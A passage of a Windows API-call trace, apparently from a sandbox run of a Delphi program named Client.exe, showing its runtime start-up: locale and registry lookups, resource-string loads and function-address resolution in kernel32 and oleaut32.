lpProcName="GetThreadPreferredUILanguages") returned 0x76a44d41 [0285.541] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0285.541] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadPreferredUILanguages") returned 0x76a57f95 [0285.542] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0285.542] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadUILanguage") returned 0x769ecf04 [0285.542] GetSystemInfo (in: lpSystemInfo=0x18ff08 | out: lpSystemInfo=0x18ff08*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0285.542] GetCommandLineW () returned="C:\\Windows\\Client.exe" [0285.542] GetStartupInfoW (in: lpStartupInfo=0x18fee4 | out: lpStartupInfo=0x18fee4*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\Client.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x24a, hStdError=0x1f80)) [0285.542] GetACP () returned 0x4e4 [0285.542] GetCurrentThreadId () returned 0xd44 [0285.542] GetVersion () returned 0x1db10106 [0285.542] GetVersionExW (in: lpVersionInformation=0x18fe28*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x18fe7c, dwBuildNumber=0xa3fa40, dwPlatformId=0x18fed8, szCSDVersion="͢瞡瞠﫚瞟ﮐ盾￿￿%") | out: lpVersionInformation=0x18fe28*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0285.542] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x18dce8, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0285.543] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18dad2, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0285.543] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x8e0000 [0285.543] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da48 | out: phkResult=0x18da48*=0x0) returned 0x2 [0285.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da48 | out: phkResult=0x18da48*=0x0) returned 0x2 [0285.544] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da48 | out: phkResult=0x18da48*=0x0) returned 0x2 [0285.544] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da48 | out: phkResult=0x18da48*=0x0) returned 0x2 [0285.544] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da48 | out: phkResult=0x18da48*=0x0) returned 0x2 [0285.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18da48 | out: phkResult=0x18da48*=0x0) returned 0x2 [0285.545] GetUserDefaultUILanguage () returned 0x409 [0285.545] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0285.545] GetThreadUILanguage () returned 0x180409 [0285.545] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18da28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18da50 | out: pulNumLanguages=0x18da28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18da50) returned 1 [0285.545] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18da28, pwszLanguagesBuffer=0xa0a680, pcchLanguagesBuffer=0x18da50 | out: pulNumLanguages=0x18da28, pwszLanguagesBuffer=0xa0a680, pcchLanguagesBuffer=0x18da50) returned 1 [0285.545] FindFirstFileW (in: lpFileName="C:\\Windows\\Client.en-US", lpFindFileData=0x18d7f0 | out: lpFindFileData=0x18d7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x1a5, ftCreationTime.dwHighDateTime=0x1010004, ftLastAccessTime.dwLowDateTime=0x18d734, ftLastAccessTime.dwHighDateTime=0x3, ftLastWriteTime.dwLowDateTime=0x18da60, ftLastWriteTime.dwHighDateTime=0x1a5, nFileSizeHigh=0x1d8c182, nFileSizeLow=0xfffffffe, dwReserved0=0x77a1387a, dwReserved1=0x125, cFileName="", cAlternateFileName="赬¡릀@\x12")) returned 0xffffffff [0285.546] FindFirstFileW (in: lpFileName="C:\\Windows\\Client.en", lpFindFileData=0x18d7f0 | out: lpFindFileData=0x18d7f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x1a5, ftCreationTime.dwHighDateTime=0x1010004, ftLastAccessTime.dwLowDateTime=0x18d734, ftLastAccessTime.dwHighDateTime=0x3, ftLastWriteTime.dwLowDateTime=0x18da60, ftLastWriteTime.dwHighDateTime=0x1a5, nFileSizeHigh=0x1d8c182, nFileSizeLow=0xfffffffe, dwReserved0=0x77a1387a, dwReserved1=0x125, cFileName="", cAlternateFileName="赬¡릀@\x12")) returned 0xffffffff [0285.546] GetUserDefaultUILanguage () returned 0x409 [0285.546] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x18da6c, cchData=4 | out: lpLCData="ENU") returned 4 [0285.547] FindFirstFileW (in: lpFileName="C:\\Windows\\Client.ENU", lpFindFileData=0x18d7f8 | out: lpFindFileData=0x18d7f8*(dwFileAttributes=0x1010004, ftCreationTime.dwLowDateTime=0x18d734, ftCreationTime.dwHighDateTime=0x3, ftLastAccessTime.dwLowDateTime=0x18da60, ftLastAccessTime.dwHighDateTime=0x1a5, ftLastWriteTime.dwLowDateTime=0x1d8c182, ftLastWriteTime.dwHighDateTime=0xfffffffe, nFileSizeHigh=0x77a1387a, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0xa300c4, cFileName="¤4쀀", cAlternateFileName="赬¡릀@\x12")) returned 0xffffffff [0285.547] FindFirstFileW (in: lpFileName="C:\\Windows\\Client.EN", lpFindFileData=0x18d7f8 | out: lpFindFileData=0x18d7f8*(dwFileAttributes=0x1010004, ftCreationTime.dwLowDateTime=0x18d734, ftCreationTime.dwHighDateTime=0x3, ftLastAccessTime.dwLowDateTime=0x18da60, ftLastAccessTime.dwHighDateTime=0x1a5, ftLastWriteTime.dwLowDateTime=0x1d8c182, ftLastWriteTime.dwHighDateTime=0xfffffffe, nFileSizeHigh=0x77a1387a, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0xa300c4, cFileName="¤4쀀", cAlternateFileName="赬¡릀@\x12")) returned 0xffffffff [0285.548] LoadStringW (in: hInstance=0x400000, uID=0xffb9, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0285.548] LoadStringW (in: hInstance=0x400000, uID=0xffb8, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0285.548] LoadStringW (in: hInstance=0x400000, uID=0xffb7, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0285.548] LoadStringW (in: hInstance=0x400000, uID=0xffb6, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0285.548] LoadStringW (in: hInstance=0x400000, uID=0xffb5, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0285.548] LoadStringW (in: hInstance=0x400000, uID=0xffb4, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0285.549] LoadStringW (in: hInstance=0x400000, uID=0xffb2, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0285.549] LoadStringW (in: hInstance=0x400000, uID=0xffb3, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0285.728] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0285.728] LoadStringW (in: hInstance=0x400000, uID=0xffce, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0285.728] LoadStringW (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffec, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffea, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18df18, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18df10, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0285.729] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x18df10, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0285.729] GetVersionExW (in: lpVersionInformation=0x18fe24*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fe24*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0285.730] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0285.730] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xa4f2c0 [0285.730] GetProcAddress (hModule=0x769b0000, lpProcName="GetNativeSystemInfo") returned 0x769d106d [0285.730] GetNativeSystemInfo (in: lpSystemInfo=0x18fe00 | out: lpSystemInfo=0x18fe00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0285.730] LoadStringW (in: hInstance=0x400000, uID=0xff08, lpBuffer=0x18dde8, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xff0b, lpBuffer=0x18dde8, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="Invalid filename") returned 0x10 [0285.731] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18df08, cchBufferMax=4096 | out: lpBuffer="File not found") returned 0xe [0285.731] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fcea, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0285.731] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fef8 | out: phkResult=0x18fef8*=0x0) returned 0x2 [0285.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fef8 | out: phkResult=0x18fef8*=0x0) returned 0x2 [0285.731] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fef8 | out: phkResult=0x18fef8*=0x0) returned 0x2 [0285.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fef8 | out: phkResult=0x18fef8*=0x0) returned 0x2 [0285.732] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fef8 | out: phkResult=0x18fef8*=0x0) returned 0x2 [0285.732] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fef8 | out: phkResult=0x18fef8*=0x0) returned 0x2 [0285.732] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0285.732] GetProcAddress (hModule=0x769b0000, lpProcName="GetLogicalProcessorInformation") returned 0x76a44d01 [0285.732] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0285.732] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0xa4f2d0 [0285.732] GetProcAddress (hModule=0x769b0000, lpProcName="GetLogicalProcessorInformation") returned 0x76a44d01 [0285.732] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x18fee0 | out: Buffer=0x0, ReturnedLength=0x18fee0) returned 0 [0285.732] GetLastError () returned 0x7a [0285.732] GetLogicalProcessorInformation (in: Buffer=0x9c99d0, ReturnedLength=0x18fee0 | out: Buffer=0x9c99d0, ReturnedLength=0x18fee0) returned 1 [0285.732] GetCurrentThreadId () returned 0xd44 [0285.732] GetCurrentThreadId () returned 0xd44 [0285.732] GetVersionExW (in: lpVersionInformation=0x18fdf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77a51ecd, dwMinorVersion=0x1d8b50a, dwBuildNumber=0xfffffffe, dwPlatformId=0x77a10338, szCSDVersion="ǂ瞡") | out: lpVersionInformation=0x18fdf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0285.733] GetCurrentThreadId () returned 0xd44 [0285.733] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0285.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CompareStringOrdinal", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0285.733] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CompareStringOrdinal", cchWideChar=20, lpMultiByteStr=0x9d80dc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CompareStringOrdinal", lpUsedDefaultChar=0x0) returned 20 [0285.733] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringOrdinal") returned 0x769e05d8 [0285.733] GetThreadLocale () returned 0x409 [0285.733] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fe34 | out: lpCPInfo=0x18fe34) returned 1 [0285.733] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0285.733] GetCurrentThreadId () returned 0xd44 [0285.733] GetCurrentThreadId () returned 0xd44 [0285.733] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="2") returned 2 [0285.733] EnumCalendarInfoW (lpCalInfoEnumProc=0x42ed90, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0285.734] EnumCalendarInfoW (lpCalInfoEnumProc=0x42ee38, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0285.734] GetCurrentThreadId () returned 0xd44 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Sun") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Sunday") returned 7 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Mon") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Monday") returned 7 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Tue") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Tuesday") returned 8 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Wed") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Wednesday") returned 10 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Thu") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Thursday") returned 9 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Fri") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Friday") returned 7 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Sat") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fb88, cchData=256 | out: lpLCData="Saturday") returned 9 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Jan") returned 4 [0285.734] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="January") returned 8 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Feb") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="February") returned 9 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Mar") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="March") returned 6 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Apr") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="April") returned 6 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="May") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="May") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Jun") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="June") returned 5 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Jul") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="July") returned 5 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Aug") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="August") returned 7 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Sep") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="September") returned 10 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Oct") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="October") returned 8 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Nov") returned 4 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="November") returned 9 [0285.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="Dec") returned 4 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="December") returned 9 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x18fbdc, cchData=256 | out: lpLCData="$") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fbdc, cchData=256 | out: lpLCData="0") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fbdc, cchData=256 | out: lpLCData="0") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x18fdd0, cchData=3 | out: lpLCData=",") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x18fdd0, cchData=3 | out: lpLCData=".") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x18fbdc, cchData=256 | out: lpLCData="2") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fdd0, cchData=3 | out: lpLCData="/") returned 2 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fb98, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0285.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fb98, cchData=256 | out: lpLCData="1") returned 2 [0285.736] LCMapStringW (in: Locale=0x409, dwMapFlags=0x1000100, lpSrcStr="M/d/yyyy", cchSrc=8, lpDestStr=0x9d821c, cchDest=8 | out: lpDestStr="m/d/yyyy") returned 8 [0285.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x18fb98, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0285.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fb98, cchData=256 | out: lpLCData="1") returned 2 [0285.740] LCMapStringW (in: Locale=0x409, dwMapFlags=0x1000100, lpSrcStr="dddd, MMMM dd, yyyy", cchSrc=19, lpDestStr=0x9f4f2c, cchDest=19 | out: lpDestStr="dddd, mmmm dd, yyyy") returned 19 [0285.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fdd0, cchData=3 | out: lpLCData=":") returned 2 [0285.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x18fbdc, cchData=256 | out: lpLCData="AM") returned 3 [0285.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x18fbdc, cchData=256 | out: lpLCData="PM") returned 3 [0285.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x1003, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="h:mm:ss tt") returned 11 [0285.741] GetLocaleInfoW (in: Locale=0x409, LCType=0x79, lpLCData=0x18fb8c, cchData=256 | out: lpLCData="h:mm tt") returned 8 [0285.741] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x18fdd0, cchData=3 | out: lpLCData=",") returned 2 [0285.741] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x757f0000 [0285.741] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0285.741] GetProcAddress (hModule=0x757f0000, lpProcName="VarNeg") returned 0x7586c802 [0285.741] GetProcAddress (hModule=0x757f0000, lpProcName="VarNot") returned 0x7586ec66 [0285.741] GetProcAddress (hModule=0x757f0000, lpProcName="VarAdd") returned 0x75815934 [0285.741] GetProcAddress (hModule=0x757f0000, lpProcName="VarSub") returned 0x7586d332 [0285.741] GetProcAddress (hModule=0x757f0000, lpProcName="VarMul") returned 0x7586dbd4 [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarDiv") returned 0x7586e405 [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarIdiv") returned 0x7586f00a [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarMod") returned 0x7586f15e [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarAnd") returned 0x75815a98 [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarOr") returned 0x7586ecfa [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarXor") returned 0x7586ee2e [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarCmp") returned 0x7580b0dc [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarI4FromStr") returned 0x75806fab [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarR4FromStr") returned 0x758101a0 [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarR8FromStr") returned 0x7580699e [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarDateFromStr") returned 0x75816ba7 [0285.742] GetProcAddress (hModule=0x757f0000, lpProcName="VarCyFromStr") returned 0x75836c12 [0285.743] GetProcAddress (hModule=0x757f0000, lpProcName="VarBoolFromStr") returned 0x7580dbd1 [0285.743] GetProcAddress (hModule=0x757f0000, 